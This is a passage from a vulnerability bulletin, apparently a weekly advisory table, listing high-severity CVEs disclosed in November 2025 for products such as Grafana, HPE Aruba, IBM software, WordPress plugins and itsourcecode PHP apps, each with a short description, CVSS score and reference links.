| g33kyrash--Online-Banking-System | A vulnerability was detected in g33kyrash Online-Banking-System up to 12dbfa690e5af649fb72d2e5d3674e88d6743455. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument Username results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. | 2025-11-17 | 7.3 | CVE-2025-13276 | VDB-332611 | g33kyrash Online-Banking-System index.php sql injection VDB-332611 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690087 | Report_Online-Banking-System web 1.0 SQL Injection https://github.com/Nianalb/Report_Online-Banking-System/blob/main/SQL.docx   |
| genetechproducts--Pie Forms Drag & Drop Form Builder | The Pie Forms for WP plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6 via the format_classic function. This is due to insufficient file type validation where the validate_classic method validates file extensions and sets error messages but does not prevent the file upload process from continuing. This makes it possible for unauthenticated attackers to upload files with dangerous extensions such as PHP, which makes remote code execution possible. In order to exploit this vulnerability, the attacker needs to guess the directory in which the file is placed (which is a somewhat predictable hash). In addition to that, the file name is generated using a secure hash method, limiting the exploitability of this vulnerability. | 2025-11-18 | 8.1 | CVE-2025-12528 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4941a0ce-67f1-430d-bbad-3c97a4ed449e?source=cve https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L331 https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L475 https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L18   |
| Grafana--Grafana Enterprise | SCIM provisioning was introduced in Grafana Enterprise and Grafana Cloud in April to improve how organizations manage users and teams in Grafana by introducing automated user lifecycle management. In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow to override internal user IDs and lead to impersonation or privilege escalation. This vulnerability applies only if all of the following conditions are met: - `enableSCIM` feature flag set to true - `user_sync_enabled` config option in the `[auth.scim]` block set to true | 2025-11-21 | 10 | CVE-2025-41115 | https://grafana.com/security/security-advisories/CVE-2025-41115   |
| Gravity Forms--Gravity Forms | The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the legacy chunked upload mechanism in all versions up to, and including, 2.9.21.1. This is due to the extension blacklist not including .phar files, which can be uploaded through the chunked upload mechanism. This makes it possible for unauthenticated attackers to upload executable .phar files and achieve remote code execution on the server, granted they can discover or enumerate the upload path. In order for an attacker to achieve RCE, the web server needs to be set up to process .phar file as PHP via file handler mapping or similar. | 2025-11-18 | 8.1 | CVE-2025-12974 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b6395439-da45-4b64-8e30-b106dffd46c1?source=cve https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/upload.php#L97 https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/common/common.php#L4178 https://docs.gravityforms.com/gravityforms-change-log/   |
| HAProxy Technologies--HAProxy Community Edition | Inefficient algorithm complexity in mjson in HAProxy allows remote attackers to cause a denial of service via specially crafted JSON requests. | 2025-11-19 | 7.5 | CVE-2025-11230 | https://www.haproxy.com/blog/october-2025-cve-2025-11230-haproxy-mjson-library-denial-of-service-vulnerability   |
| HashiCorp--Tooling | Vault's Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0. | 2025-11-21 | 7.4 | CVE-2025-13357 | https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking 100 Series Cellular Bridge | A vulnerability in the web-based management interface of affected products could allow an unauthenticated remote attacker to cause a denial of service. Successful exploitation could allow an attacker to crash the system, preventing it from rebooting without manual intervention and disrupting network operations. | 2025-11-18 | 7.5 | CVE-2025-37161 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A vulnerability in the SSH restricted shell interface of the network management services allows improper access control for authenticated read-only users. If successfully exploited, this vulnerability could allow an attacker with read-only privileges to gain administrator access on the affected system. | 2025-11-18 | 7.8 | CVE-2025-37155 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking Management Software (Airwave) | A command injection vulnerability has been identified in the command line interface of the HPE Aruba Networking Airwave Platform. An authenticated attacker could exploit this vulnerability to execute arbitrary operating system commands with elevated privileges on the underlying operating system. | 2025-11-18 | 7.2 | CVE-2025-37163 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us&docLocale=en_US   |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to version 1.43.3, stored XSS vulnerability exists, allowing the execution of arbitrary JavaScript in a user's browser, with minimal or no user interaction required, due to the rendering of a malicious uploaded SVG file. This could be abused to add an attacker's account to the "credentials-admin" group, giving them full administrative access, if a user logged in as an administrator was to view the page which renders or redirects to the SVG. This issue has been patched in version 1.43.3. | 2025-11-19 | 8.1 | CVE-2025-64759 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-wj62-c5gr-2x53 https://github.com/homarr-labs/homarr/commit/aaa23f37321be1e110f722b36889b2fd3bea2059   |
| husainali52--WP AUDIO GALLERY | The WP AUDIO GALLERY plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 2.0. This is due to the `wpag_uploadaudio_callback()` AJAX handler not properly validating user-supplied file paths in the `audio_upload` parameter before passing them to `unlink()`. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when critical files like wp-config.php are deleted. | 2025-11-21 | 8.1 | CVE-2025-13322 | https://www.wordfence.com/threat-intel/vulnerabilities/id/101675ae-88cf-42fc-b9ea-5dd37cdf7464?source=cve https://plugins.trac.wordpress.org/browser/wp-audio-gallery/tags/2.0/wp-audio-gallery.php#L150 https://plugins.trac.wordpress.org/browser/wp-audio-gallery/tags/2.0/wp-audio-gallery.php#L513 https://plugins.trac.wordpress.org/browser/wp-audio-gallery/tags/2.0/wp-audio-gallery.php#L607   |
| IBM--IBM Planning Analytics Local | IBM Planning Analytics Local 2.1.0 through 2.1.14 could allow a remote authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing absolute path sequences to view, read, or write arbitrary files on the system. | 2025-11-17 | 8 | CVE-2025-36357 | https://www.ibm.com/support/pages/node/7251265   |
| IBM--Storage Virtualize | IBM Storage Virtualize 8.4, 8.5, 8.7, and 9.1 IKEv1 implementation allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request. | 2025-11-17 | 7.5 | CVE-2025-36118 | https://www.ibm.com/support/pages/node/7250954   |
| IBM--webMethods Integration | IBM webMethods Integration 10.11 through 10.11_Core_Fix22, 10.15 through 10.15_Core_Fix22, and 11.1 through 11.1_Core_Fix6 IBM webMethods Integration allow an authenticated user to execute arbitrary code on the system, caused by the deserialization of untrusted object graphs data. | 2025-11-20 | 8.8 | CVE-2025-36072 | https://www.ibm.com/support/pages/node/7252090   |
| ideastocode--Enable SVG, WebP, and ICO Upload | The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 1.1.2. This is due to insufficient file type validation detecting ICO files, allowing double extension files with the appropriate magic bytes to bypass sanitization while being accepted as a valid ICO file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-18 | 8.8 | CVE-2025-13069 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5716c4e1-a6d3-42e8-b90c-d16f204c8503?source=cve https://wordpress.org/plugins/enable-svg-webp-ico-upload/   |
| ikhodal--Category and Product Woocommerce Tabs | The Category and Product Woocommerce Tabs plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0. This is due to insufficient input validation on the 'template' parameter in the categoryProductTab() function. This makes it possible for authenticated attackers, with contributor level access and above, to include and execute arbitrary .php files on the server. | 2025-11-18 | 8.8 | CVE-2025-13088 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c3938bbb-dc3d-4550-a05d-0cde970e38f8?source=cve https://plugins.trac.wordpress.org/browser/category-and-product-woocommerce-tabs/tags/1.0/include/wccategorytab.php#L108   |
| iqonicdesign--WPBookit | The WPBookit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'css_code' parameter in all versions up to, and including, 1.0.6 due to a missing capability check on the save_custome_code() function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 7.2 | CVE-2025-12135 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7d7b2c79-c4f7-4611-a22a-685d4421a4ab?source=cve https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes-handler.php#L15 https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes.php#L118 https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-setting-controller.php#L16 https://github.com/d0n601/CVE-2025-12135 https://ryankozak.com/posts/cve-2025-12135/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398463%40wpbookit&new=3398463%40wpbookit&sfp_email=&sfph_mail=   |
| isaacs--node-glob | Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0. | 2025-11-17 | 7.5 | CVE-2025-64756 | https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2 https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146   |
| itsourcecode--Human Resource Management System | A weakness has been identified in itsourcecode Human Resource Management System 1.0. This issue affects some unknown processing of the file /src/store/EventStore.php. This manipulation of the argument eventSubject causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-11-19 | 7.3 | CVE-2025-13420 | VDB-332942 | itsourcecode Human Resource Management System EventStore.php sql injection VDB-332942 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #695952 | itsourcecode Human Resource Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/8 https://itsourcecode.com/   |
| itsourcecode--Human Resource Management System | A security vulnerability has been detected in itsourcecode Human Resource Management System 1.0. Impacted is an unknown function of the file /src/store/NoticeStore.php. Such manipulation of the argument noticeDesc leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-11-19 | 7.3 | CVE-2025-13421 | VDB-332943 | itsourcecode Human Resource Management System NoticeStore.php sql injection VDB-332943 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #695953 | itsourcecode Human Resource Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/9 https://itsourcecode.com/   |
| itsourcecode--Inventory Management System | A security vulnerability has been detected in itsourcecode Inventory Management System 1.0. The affected element is an unknown function of the file /admin/user/index.php?view=edit. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 7.3 | CVE-2025-13257 | VDB-332592 | itsourcecode Inventory Management System index.php sql injection VDB-332592 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #687863 | itsourcecode Inventory Management System V1.0 SQL Injection https://github.com/iamzzzzz/iam/issues/3 https://itsourcecode.com/   |
| itsourcecode--Online File Management System | A security flaw has been discovered in itsourcecode Online File Management System 1.0. This issue affects some unknown processing of the file /ajax.php?action=login. The manipulation of the argument Username results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-11-21 | 7.3 | CVE-2025-13485 | VDB-333085 | itsourcecode Online File Management System ajax.php sql injection VDB-333085 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696405 | Itsourcecode Itsourcecode Online File Management System V1.0 SQL Injection https://github.com/jaisurya-me/CVE/issues/1 https://itsourcecode.com/   |
| itsourcecode--Online Voting System | A vulnerability was identified in itsourcecode Online Voting System 1.0. The affected element is an unknown function of the file /login.php. Such manipulation of the argument Username leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2025-11-17 | 7.3 | CVE-2025-13285 | VDB-332625 | itsourcecode Online Voting System login.php sql injection VDB-332625 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690884 | itsourcecode Online Voting System V1.0 SQL Injection Submit #690887 | itsourcecode Online Voting System V1.0 SQL Injection (Duplicate) https://github.com/WANGshuyan2025/cve/issues/6 https://itsourcecode.com/   |
| itsourcecode--Web-Based Internet Laboratory Management System | A security vulnerability has been detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. The impacted element is an unknown function of the file /course/controller.php. Such manipulation leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 7.3 | CVE-2025-13297 | VDB-332637 | itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection VDB-332637 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691786 | itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/3 https://itsourcecode.com/   |
| itsourcecode--Web-Based Internet Laboratory Management System | A vulnerability was detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. This affects an unknown function of the file /enrollment/controller.php. Performing manipulation results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2025-11-17 | 7.3 | CVE-2025-13298 | VDB-332638 | itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection VDB-332638 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691787 | itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/4 https://itsourcecode.com/   |
| itsourcecode--Web-Based Internet Laboratory Management System | A flaw has been found in itsourcecode Web-Based Internet Laboratory Management System 1.0. This impacts an unknown function of the file /user/controller.php. Executing manipulation can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. | 2025-11-17 | 7.3 | CVE-2025-13299 | VDB-332639 | itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection VDB-332639 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691789 | itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/5 https://itsourcecode.com/   |
| itsourcecode--Web-Based Internet Laboratory Management System | A vulnerability has been found in itsourcecode Web-Based Internet Laboratory Management System 1.0. Affected is an unknown function of the file /settings/controller.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 7.3 | CVE-2025-13300 | VDB-332640 | itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection VDB-332640 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691790 | itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/6 https://itsourcecode.com/   |
| itsourcecode--Web-Based Internet Laboratory Management System | A vulnerability was found in itsourcecode Web-Based Internet Laboratory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /subject/controller.php. The manipulation results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2025-11-17 | 7.3 | CVE-2025-13301 | VDB-332641 | itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection VDB-332641 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691793 | itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/7 https://itsourcecode.com/   |
| jackdewey--Community Events | The Community Events plugin for WordPress is vulnerable to SQL Injection via the 'dayofyear' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-19 | 7.5 | CVE-2025-12646 | https://www.wordfence.com/threat-intel/vulnerabilities/id/579b6eb0-dbb7-4586-aecc-f295889a2b2b?source=cve https://plugins.trac.wordpress.org/changeset/3396731/community-events/trunk/community-events.php   |
| jemoreto--Multiple Roles per User | The Multiple Roles per User plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mrpu_add_multiple_roles_ui' and 'mrpu_save_multiple_user_roles' functions in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, granted the 'edit_users' capability, to edit any user's role, including promoting users to Administrator and demoting Administrators to lower-privileged roles. | 2025-11-18 | 7.2 | CVE-2025-11620 | https://www.wordfence.com/threat-intel/vulnerabilities/id/30741601-50b9-4799-a340-11f6ffa59553?source=cve https://plugins.trac.wordpress.org/browser/multiple-roles-per-user/trunk/multiple-roles-per-user.php#L54 https://plugins.trac.wordpress.org/browser/multiple-roles-per-user/trunk/multiple-roles-per-user.php#L121   |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'columns_search' parameter of the select_2_ajax() function in all versions up to, and including, 1.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-21 | 7.5 | CVE-2025-13138 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0cad8c48-5c96-484c-acda-b33d8d8d10d3?source=cve https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.3/application/controllers/Wdk_frontendajax.php#L546 https://wordpress.org/plugins/wpdirectorykit/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=   |
| lsfusion--platform | A vulnerability was determined in lsfusion platform up to 6.1. Affected by this vulnerability is the function UploadFileRequestHandler of the file platform/web-client/src/main/java/lsfusion/http/controller/file/UploadFileRequestHandler.java. Executing manipulation of the argument sid can lead to path traversal. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 7.3 | CVE-2025-13262 | VDB-332597 | lsfusion platform UploadFileRequestHandler.java UploadFileRequestHandler path traversal VDB-332597 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689414 | lsFusion 6.1 Arbitrary File Upload https://github.com/lsfusion/platform/issues/1544 https://github.com/lsfusion/platform/issues/1544#issue-3589610731   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability exists in the poll finalization feature of the application. Any authenticated user can finalize a poll they do not own by manipulating the pollId parameter in the request. This allows unauthorized users to finalize other users' polls and convert them into events without proper authorization checks, potentially disrupting user workflows and causing data integrity and availability issues. This issue has been patched in version 4.5.4. | 2025-11-19 | 9.1 | CVE-2025-65021 | https://github.com/lukevella/rallly/security/advisories/GHSA-x7w2-g548-4qg8 https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to delete arbitrary participants from polls without ownership verification. The endpoint relies solely on a participant ID to authorize deletions, enabling attackers to remove other users (including poll owners) from polls. This impacts the integrity and availability of poll participation data. This issue has been patched in version 4.5.4. | 2025-11-19 | 8.1 | CVE-2025-65029 | https://github.com/lukevella/rallly/security/advisories/GHSA-f8jc-6746-ww95 https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the poll management feature allows any authenticated user to pause or resume any poll, regardless of ownership. The system only uses the public pollId to identify polls, and it does not verify whether the user performing the action is the poll owner. As a result, any user can disrupt polls created by others, leading to a loss of integrity and availability across the application. This issue has been patched in version 4.5.4. | 2025-11-19 | 8.1 | CVE-2025-65033 | https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3 https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization vulnerability allows any authenticated user to reopen finalized polls belonging to other users by manipulating the pollId parameter. This can disrupt events managed by other users and compromise both availability and integrity of poll data. This issue has been patched in version 4.5.4. | 2025-11-19 | 8.1 | CVE-2025-65034 | https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the comment deletion API allows any authenticated user to delete comments belonging to other users, including poll owners and administrators. The endpoint relies solely on the comment ID for deletion and does not validate whether the requesting user owns the comment or has permission to remove it. This issue has been patched in version 4.5.4. | 2025-11-19 | 7.1 | CVE-2025-65030 | https://github.com/lukevella/rallly/security/advisories/GHSA-4j32-25f9-qgfm https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| METZ CONNECT--Energy-Controlling EWIO2-M | The commissioning wizard on the affected devices does not validate if the device is already initialized. An unauthenticated remote attacker can construct POST requests to set root credentials. | 2025-11-18 | 9.8 | CVE-2025-41733 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | An unauthenticated remote attacker can execute arbitrary php files and gain full access of the affected devices. | 2025-11-18 | 9.8 | CVE-2025-41734 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | A low privileged remote attacker can upload any file to an arbitrary location due to missing file check resulting in remote code execution. | 2025-11-18 | 8.8 | CVE-2025-41735 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | A low privileged remote attacker can upload a new or overwrite an existing python script by using a path traversal of the target filename in php resulting in a remote code execution. | 2025-11-18 | 8.8 | CVE-2025-41736 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | Due to webserver misconfiguration an unauthenticated remote attacker is able to read the source of php modules. | 2025-11-18 | 7.5 | CVE-2025-41737 | https://certvde.com/de/advisories/VDE-2025-097   |
| Microsoft--Azure Bastion Developer | Azure Bastion Elevation of Privilege Vulnerability | 2025-11-20 | 10 | CVE-2025-49752 | Azure Bastion Elevation of Privilege Vulnerability   |
| Microsoft--Azure Monitor Control Service | Azure Monitor Elevation of Privilege Vulnerability | 2025-11-20 | 8.6 | CVE-2025-62207 | Azure Monitor Elevation of Privilege Vulnerability   |
| Microsoft--Dynamics OmniChannel SDK Storage Containers | Improper authorization in Dynamics OmniChannel SDK Storage Containers allows an unauthorized attacker to elevate privileges over a network. | 2025-11-20 | 8.8 | CVE-2025-64655 | Dynamics OmniChannel SDK Storage Containers Elevation of Privilege Vulnerability   |
| Microsoft--Microsoft 365 Defender Portal | Microsoft Defender Portal Spoofing Vulnerability | 2025-11-20 | 8.3 | CVE-2025-62459 | Microsoft Defender Portal Spoofing Vulnerability   |
| Microsoft--Microsoft SharePoint Online | Microsoft SharePoint Online Elevation of Privilege Vulnerability | 2025-11-20 | 9.8 | CVE-2025-59245 | Microsoft SharePoint Online Elevation of Privilege Vulnerability   |
| Mitsubishi Electric Corporation--MILCO.S Setting Application | Uncontrolled Search Path Element Vulnerability in Setting and Operation Application for Lighting Control System MILCO.S Setting Application all versions, MILCO.S Setting Application (IR) all versions, MILCO.S Easy Setting Application (IR) all versions, and MILCO.S Easy Switch Application (IR) all versions allows a local attacker to execute malicious code by having installer to load a malicious DLL. However, if the signer name "Mitsubishi Electric Lighting" appears on the "Digital Signatures" tab of the properties for "MILCO.S Lighting Control.exe", the application is a fixed one. This vulnerability only affects when the installer is run, not after installation. If a user downloads directly from Mitsubishi Electric website and installs the affected product, there is no risk of malicious code being introduced. | 2025-11-18 | 7 | CVE-2025-10089 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-015_en.pdf https://jvn.jp/vu/JVNVU97181602/   |
| Muse Group--MuseHub | A security flaw has been discovered in Muse Group MuseHub 2.1.0.1567. The affected element is an unknown function of the file C:\Program Files\WindowsApps\Muse.MuseHub_2.1.0.1567_x64__rb9pth70m6nz6\Muse.Updater.exe of the component Windows Service. The manipulation results in unquoted search path. The attack is only possible with local access. A high complexity level is associated with this attack. The exploitability is described as difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 7 | CVE-2025-13433 | VDB-332977 | Muse Group MuseHub Windows Service Muse.Updater.exe unquoted search path VDB-332977 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #687547 | Muse Group MuseHub 2.1.0.1567 Unquoted Search Path https://github.com/lakshayyverma/CVE-Discovery/blob/main/Musehub.md   |
| n/a--cbor2 through version 5.7.0 | Multiple vulnerabilities exist in cbor2 through version 5.7.0 in the decode_definite_long_string() function of the C extension decoder (source/decoder.c): (1) Integer Underflow Leading to Out-of-Bounds Read (CWE-191, CWE-125): An incorrect variable reference and missing state reset in the chunk processing loop causes buffer_length to not be reset to zero after UTF-8 character consumption. This results in subsequent chunk_length calculations producing negative values (e.g., chunk_length = 65536 - buffer_length), which are passed as signed integers to the read() method, potentially triggering unlimited read operations and resource exhaustion. (2) Memory Leak via Missing Reference Count Release (CWE-401): The main processing loop fails to release Python object references (Py_DECREF) for chunk objects allocated in each iteration. For CBOR strings longer than 65536 bytes, this causes cumulative memory leaks proportional to the payload size, enabling memory exhaustion attacks through repeated processing of large CBOR payloads. Both vulnerabilities can be exploited remotely without authentication by sending specially-crafted CBOR data containing definite-length text strings with multi-byte UTF-8 characters positioned at 65536-byte chunk boundaries. Successful exploitation results in denial of service through process crashes (CBORDecodeEOF exceptions) or memory exhaustion. The vulnerabilities affect all applications using cbor2's C extension to process untrusted CBOR data, including web APIs, IoT data collectors, and message queue processors. Fixed in commit 851473490281f82d82560b2368284ef33cf6e8f9 pushed with released version 5.7.1. | 2025-11-18 | 7.5 | CVE-2025-64076 | https://github.com/agronholm/cbor2/issues/264 https://github.com/agronholm/cbor2/pull/265 https://github.com/agronholm/cbor2/commit/851473490281f82d82560b2368284ef33cf6e8f9   |
| Narkom Communication and Software Technologies Trade Ltd. Co.--Pyxis Signage | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Stored XSS.This issue affects Pyxis Signage: through 31012025. | 2025-11-20 | 7.2 | CVE-2025-0643 | https://www.usom.gov.tr/bildirim/tr-25-0404   |
| Narkom Communication and Software Technologies Trade Ltd. Co.--Pyxis Signage | Unrestricted Upload of File with Dangerous Type vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Pyxis Signage: through 31012025. | 2025-11-20 | 7.2 | CVE-2025-0645 | https://www.usom.gov.tr/bildirim/tr-25-0404   |
| nazsabuz--WP Dropzone | The WP Dropzone plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 1.1.0 via the `ajax_upload_handle` function. This is due to the chunked upload functionality writing files directly to the uploads directory before any file type validation occurs. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-18 | 8.8 | CVE-2025-12775 | https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7aeb7-2c6f-4b23-b8b1-52fb010e5aac?source=cve https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L88 https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L127 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395966%40wp-dropzone&new=3395966%40wp-dropzone&sfp_email=&sfph_mail=   |
| Nettec AS--Digi On-Prem Manager | An injection vulnerability has been discovered in the API feature in Digi On-Prem Manager, enabling an attacker with valid API tokens to inject SQL via crafted input. The API is not enabled by default, and a valid API token is required to perform the attack. | 2025-11-17 | 8.8 | CVE-2025-13319 | https://dom.nettec.no/security-advisories/DOM-25-001/   |
| nmedia--Simple User Registration | The Simple User Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpr_admin_msg' parameter in all versions up to, and including, 6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 7.2 | CVE-2025-12160 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb5e60d-f7c9-4b47-ba6f-0f2d1d060263?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396064%40wp-registration&new=3396064%40wp-registration&sfp_email=&sfph_mail=   |
